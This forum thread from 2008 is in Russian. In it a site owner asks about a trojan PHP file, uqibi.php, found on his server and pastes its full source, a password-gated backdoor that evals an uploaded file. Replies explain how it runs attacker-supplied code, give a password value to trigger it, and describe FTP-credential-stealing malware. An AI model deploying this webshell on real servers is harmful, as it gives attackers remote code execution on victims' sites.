| |
|
|
| | Сегодня на своем сайте обнаружил скрипт uqibi.php, скинул себе по фтп его, попытался открыть, касперский сослался мол это троян. тогда отрубил защиту посмтрел, вот что в нем обнаружил
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
|
Чтобы это значило и как скрипт мог оказаться у меня на сайте, пароли меняются часто. | |
| |
|
|
| |
|
|
| |
для: ols
(19.12.2008 в 12:53)
| | | Ну раз сослался Касперский, то троян))
На вскидку этот скрипт исполняет код который хацкер аплодит вам на сервер.
К форме аплода добавьте скрытое поле name=p value='Ox93Mdpqme8s', а в загружаемом файле напишите echo 'привет' можт покажет чё нить | |
| |
|
|
| |
|
|
| |
для: Valick
(19.12.2008 в 13:31)
| | | В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код. | |
| |
|
|
